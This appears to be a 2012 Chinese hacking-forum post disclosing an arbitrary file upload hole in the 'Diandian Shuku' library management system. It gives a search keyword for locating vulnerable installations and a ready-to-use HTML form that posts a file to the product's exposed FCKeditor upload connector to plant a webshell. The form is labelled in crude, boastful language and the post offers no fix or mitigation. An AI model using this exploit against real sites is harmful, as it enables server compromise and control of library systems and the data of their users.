找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7574|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞, a' t' c- Z1 S
作者:冰锋刺客
' \2 z4 F2 w& }- h; K 厂商:点击书(dianjishu.com)/ G3 D$ `' P4 U1 r
日期:2012-6-21
' r) m5 C8 r, ~# Z3 b9 h
: l4 r$ V% T9 t" [I 概述
& U, Q, s  P0 o4 E7 \& b   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell( H4 `! p/ a  j- I& E
II 简介
% w+ ?* z4 P! i6 q   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
6 g9 Q$ b" u- N0 N* ^- ~0 I 补充一个漏洞
4 s0 p6 H9 V1 {1 } <form id="frmUpload" enctype="multipart/form-data"  L+ T$ G) g5 r" z" e
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
6 |# _0 {; A( Y; ~) l <input id="btnUpload" type="submit" value="操翻他">
1 I, a- S4 B- y# d0 W  m </form>
  D0 t$ T; a9 _# R8 M/ ]( X 你们懂的
8 b. w" e3 g7 @; D! r6 m/ Z 那傻逼提供还需要改包.
' Q. V% y* {0 Y. g% L8 S) G6 M 自己看了下源代码发现fckeditor
& l; S! r: x4 M5 E* v; z! \, Z 直接秒杀
- @4 s/ l# J: R1 R5 w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表